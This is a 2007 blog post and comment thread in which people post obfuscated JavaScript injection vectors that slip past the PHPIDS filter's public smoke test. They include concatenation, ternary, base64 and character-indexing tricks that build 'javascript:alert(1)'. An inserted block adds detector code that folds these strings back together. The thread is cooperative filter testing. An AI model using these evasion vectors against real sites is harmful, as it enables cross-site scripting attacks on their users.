So you think you’re a hacker?
Tuesday, 4 September 2007
I've been testing the PHPIDS after Sirdarckcat tempted me with his post. At first I created 2 simple vectors to make injection more difficult, then I spent a couple of hours coming up with a full tag and JavaScript injection. I shall post the vector here once they have fixed it, because it is quite dangerous and I don't want their site open to attack. So if you think you are a good hacker, try and inject some JavaScript on their Smoke test; it isn't as easy as it first looks.
No. 1 — September 4th, 2007 at 12:30 pm
I’ve found another serious one. I’ll share when it’s fixed. Here’s the other one I did which has now been fixed:-
s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);
No. 2 — September 4th, 2007 at 2:57 pm
Hi!
Great work again – thx a lot! It led me to refactor the converter unit of the PHPIDS, and I think I have found a pretty stable beta of the regex to check and de-assemble concatenations.
I am very much looking forward to the 0.4.0 release we are currently working on – the help of you guys is what helps improve it eminently.
Greetz,
.mario
No. 3 — September 4th, 2007 at 2:58 pm
This is also fixed now:-
s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+'';u1=s1+s2+s3;URL=u1
No. 4 — September 4th, 2007 at 3:01 pm
Good work Mario/PHPIDS team, I really admire all your efforts on this because I know how difficult it is to protect against this stuff.
I'll look forward to hacking it again though.
No. 5 — September 4th, 2007 at 3:46 pm
always appreciated!
No. 6 — September 4th, 2007 at 11:28 pm
It almost looks like ASCII art, good job!
No. 7 — September 5th, 2007 at 12:28 am
Hehe, thanks.
I might try again soon, cause I love an interesting challenge.
No. 8 — September 5th, 2007 at 4:50 am
Found another one (IE only):-
I've had to base64 encode it because it causes conversion errors:-
czE9IScnJiYnamF2JztzMj0hJycmJidhc2NyaXB0JztzMz0hJycmJic6JztzND0hJycmJidhbGVyJztzNT0hJycmJid0JztzNj0hJycmJicoMSknO3M3PXMxK3MyK3MzK3M0K3M1K3M2O1VSTD1zNzs=
No. 9 — September 6th, 2007 at 9:04 am
and another:-
s1=''+"jav"+'';s2=''+"ascri"+'';s3=''+"pt"+'';s4=''==''?':':0;s5=''+"aler"+'';s6=''+"t"+'';s7=''==''?'(1)':0;s8=s1+s2+s3+s4+s5+s6+s7;URL=s8
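The following is an added example, not PHPIDS code and not posted by anyone in this thread. It shows the kind of "de-assembly" step Mario describes in comment No. 2, applied to the vectors from comments 1, 3, 8 (decoded from its base64 at runtime) and 9: a tokenizer folds string literals, empty-string padding, ternary branches and simple variable reassembly into one plain string per statement, and a keyword check that misses every raw vector catches every folded one. The names `tokenize`, `deassemble`, `naiveCheck`, `analyze` and `KEYWORDS` are my own and are not PHPIDS identifiers.

```javascript
// Added example (not PHPIDS code): a small "de-assembler" for string
// concatenation tricks. It tokenises a JavaScript snippet, folds literals,
// empty-string padding, ternary branches and simple variable reassembly
// into one plain string per statement, then runs a keyword check over the
// folded strings. Both ternary branches are kept on purpose: a detector
// over-approximates rather than evaluates.

function tokenize(src) {
  const tokens = [];
  let i = 0;
  while (i < src.length) {
    const ch = src[i];
    if (ch === "'" || ch === '"') {
      // quoted literal, with minimal backslash-escape handling
      let j = i + 1;
      let value = '';
      while (j < src.length && src[j] !== ch) {
        if (src[j] === '\\' && j + 1 < src.length) { value += src[j + 1]; j += 2; }
        else { value += src[j]; j += 1; }
      }
      tokens.push({ type: 'str', value });
      i = j + 1;
    } else if (/[A-Za-z_$]/.test(ch)) {
      let j = i + 1;
      while (j < src.length && /[A-Za-z0-9_$]/.test(src[j])) j += 1;
      tokens.push({ type: 'ident', value: src.slice(i, j) });
      i = j;
    } else if (/\s/.test(ch)) {
      i += 1;                                  // whitespace is noise
    } else {
      tokens.push({ type: 'op', value: ch });  // any other single character
      i += 1;
    }
  }
  return tokens;
}

// Split on ';' (a ';' inside quotes is already part of a string token).
function splitStatements(tokens) {
  const stmts = [[]];
  for (const t of tokens) {
    if (t.type === 'op' && t.value === ';') stmts.push([]);
    else stmts[stmts.length - 1].push(t);
  }
  return stmts.filter((s) => s.length > 0);
}

// Fold a token list to the literals it carries, substituting variables that
// were assigned earlier. Operators (+ ? : == && !) are simply dropped.
function foldTokens(tokens, env) {
  let out = '';
  for (const t of tokens) {
    if (t.type === 'str') out += t.value;
    else if (t.type === 'ident' && t.value in env) out += env[t.value];
  }
  return out;
}

function deassemble(src) {
  const env = Object.create(null);  // variable name -> folded string
  const folded = [];                // one folded string per statement
  for (const stmt of splitStatements(tokenize(src))) {
    const isAssign = stmt.length >= 3 && stmt[0].type === 'ident' &&
      stmt[1].type === 'op' && stmt[1].value === '=' &&
      !(stmt[2].type === 'op' && stmt[2].value === '=');
    const value = foldTokens(isAssign ? stmt.slice(2) : stmt, env);
    if (isAssign) env[stmt[0].value] = value;  // sequential, so reassignment works
    folded.push(value);
  }
  return { env, folded };
}

// The check a naive filter would run on the raw input.
const KEYWORDS = /javascript:|alert\(/i;
function naiveCheck(src) { return KEYWORDS.test(src); }

// The same check, but over the folded strings.
function analyze(src) {
  const { folded } = deassemble(src);
  return { naive: naiveCheck(src), matches: folded.filter((s) => KEYWORDS.test(s)) };
}

// The vectors from comments 1, 3, 9 and (decoded at runtime) 8 of this thread.
const VECTORS = {
  comment1: "s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);",
  comment3: "s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+'';u1=s1+s2+s3;URL=u1",
  comment8: Buffer.from('czE9IScnJiYnamF2JztzMj0hJycmJidhc2NyaXB0JztzMz0hJycmJic6JztzND0hJycmJidhbGVyJztzNT0hJycmJid0JztzNj0hJycmJicoMSknO3M3PXMxK3MyK3MzK3M0K3M1K3M2O1VSTD1zNzs=', 'base64').toString('utf8'),
  comment9: "s1=''+\"jav\"+'';s2=''+\"ascri\"+'';s3=''+\"pt\"+'';s4=''==''?':':0;s5=''+\"aler\"+'';s6=''+\"t\"+'';s7=''==''?'(1)':0;s8=s1+s2+s3+s4+s5+s6+s7;URL=s8",
};

for (const [name, src] of Object.entries(VECTORS)) {
  const r = analyze(src);
  console.log(name, 'raw match:', r.naive, '| folded matches:', r.matches);
}
```

The folding deliberately ignores control flow: it never decides which ternary branch runs or whether `!''&&'jav'` is truthy, it just keeps every literal in order, which is the right trade-off for a detector. Its limit is also visible: it only sees literals and variables built from literals, so a vector that pulls characters out of a runtime value (such as reading the colon from `URL[4]`, as in the later comment) produces no `javascript:` in the folded output, which is exactly why the commenters call this an arms race.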
No. 10 — September 7th, 2007 at 3:08 pm
No. 11 — September 8th, 2007 at 10:25 am
Check this one out, creates javascript: and passes it to the URL property, only works in IE though.
No. 12 — September 8th, 2007 at 6:43 pm
Here’s my favorite:-
No. 13 — September 8th, 2007 at 10:45 pm
Yeah, I think this will be an endless arms race.
btw, do you know the JavaScript functions
import() and export()? It's pretty cool, cause you can export signed script data if import is called inside a signed script. I didn't know this; there is a lot more to be learned in JavaScript.
No. 14 — September 9th, 2007 at 9:03 am
Nope didn’t know that but sounds cool, I’m gonna google it.
No. 15 — September 9th, 2007 at 6:31 pm
No. 16 — September 9th, 2007 at 6:42 pm
Definitely an arms race; I just can't see how they can prevent all of it, because we can always come up with new ways of doing things.
Still, I'm impressed with their filters: it isn't that easy to come up with new vectors, and I've done loads of complicated ones which don't get through.
No. 17 — September 9th, 2007 at 9:05 pm
I meant:
import function() or var
export function() or var
Like:
function a() {
//foo
}
export a;
misleading stuff I know π
No. 18 — September 9th, 2007 at 9:42 pm
Found any docs on that? I would be interested to read them; I tried Mozilla but there's not much stuff on it.
No. 19 — September 10th, 2007 at 1:50 am
It is here:
http://devedge-temp.mozilla.org/library/manuals/2000/javascript/1.3/guide/sec.html
Be amazed at what the ol' Netscape can teach us; it's almost forbidden knowledge. I read the whole book over the weekend and learned tons of new and old stuff.
No. 20 — September 11th, 2007 at 10:09 am
This one's awesome:
_=alert,1,1,_(1);
No. 21 — September 18th, 2007 at 1:34 am
This one took ages, cause it's really tough now with their new filters:-
s=function test2() {return 'hrefjavascriptalert(1)a';1,1}();
void(a = {} );
void(c = URL );
a.c=function xyz() {return c[4] }();
a.h1=function xyz() {return s[0] }();
a.h2=function xyz() {return s[1] }();
a.h3=function xyz() {return s[2] }();
a.h4=function xyz() {return s[3] }();
a.u1=function xyz() {return s[4] }();
a.u2=function xyz() {return s[5] }();
a.u3=function xyz() {return s[6] }();
a.u4=function xyz() {return s[7] }();
a.u5=function xyz() {return s[8] }();
a.u6=function xyz() {return s[9] }();
a.u7=function xyz() {return s[10] }();
a.u8=function xyz() {return s[11] }();
a.u9=function xyz() {return s[12] }();
a.u10=function xyz() {return s[13] }();
a.u11=function xyz() {return s[14] }();
a.u12=function xyz() {return s[15] }();
a.u13=function xyz() {return s[16] }();
a.u14=function xyz() {return s[17] }();
a.u15=function xyz() {return s[18] }();
a.u16=function xyz() {return s[19] }();
a.u17=function xyz() {return s[20] }();
a.u18=function xyz() {return s[21] }();
$_=function xyz() {return a.u1 + a.u2 + a.u3 + a.u4 + a.u5 + a.u6 + a.u7 + a.u8 + a.u9 + a.u10 + a.c + a.u11 + a.u12 + a.u13 + a.u14 + a.u15 + a.u16 + a.u17 + a.u18 }();
for(i in x=this) x[a.h1+a.h2+a.h3+a.h4]=$_;